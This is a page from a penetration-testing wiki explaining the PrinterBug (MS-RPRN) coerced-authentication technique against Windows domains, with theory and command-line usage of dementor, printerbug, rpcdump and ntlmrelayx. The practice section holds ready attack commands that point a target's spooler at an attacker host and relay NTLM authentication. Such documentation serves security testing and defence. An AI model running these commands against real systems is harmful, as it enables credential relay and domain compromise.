The Hacker Recipes
GitHubTwitterDonate
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
MITM and coerced auths
ARP poisoning
DNS spoofing
DHCP poisoning
DHCPv6 spoofing
WSUS spoofing
LLMNR, NBT-NS, mDNS spoofing
ADIDNS poisoning
WPAD spoofing
MS-EFSR abuse (PetitPotam)
MS-RPRN abuse (PrinterBug)
MS-FSRVP abuse (ShadowCoerce)
PushSubscription abuse
WebClient abuse (WebDAV)
🛠️ NBT Name Overwrite
🛠️ ICMP Redirect
🛠️ Living off the land
NTLM
Kerberos
Access controls
Group policies
Built-in groups
Domain settings
🛠️ Trusts
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments (more info on the finding).
The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.
The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.
The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \pipe\spoolss named pipe through the IPC$ share.

Practice

Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).
The spooler service can be triggered with printerbug (Python), dementor (Python), the adapted original .NET code (here).
dementor
printerbug
rpcdump
SpoolerScanner
ntlmrelayx
Trigger the spooler service
1
dementor.py -d $DOMAIN -u $DOMAIN_USER -p $PASSWORD $ATTACKER_IP $TARGET
Copied!
Trigger the spooler service
1
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
Copied!
Check if the spooler service is available
1
rpcdump.py $TARGET | grep -A 6 "spoolsv"
Copied!
Check if the spooler service is available
1
Copied!
In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.
1
ntlmrelayx.py -t smb://$TARGET -socks
2
proxychains dementor.py -d $DOMAIN -u $DOMAIN_USER $ATTACKER_IP $TARGET
Copied!
Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.

Resources

Not A Security Boundary: Breaking Forest Trusts - harmj0y
harmj0y
Previous
MS-EFSR abuse (PetitPotam)
Next
MS-FSRVP abuse (ShadowCoerce)
Last modified 24d ago
Copy link
Edit on GitHub
Contents
Theory
Practice
Resources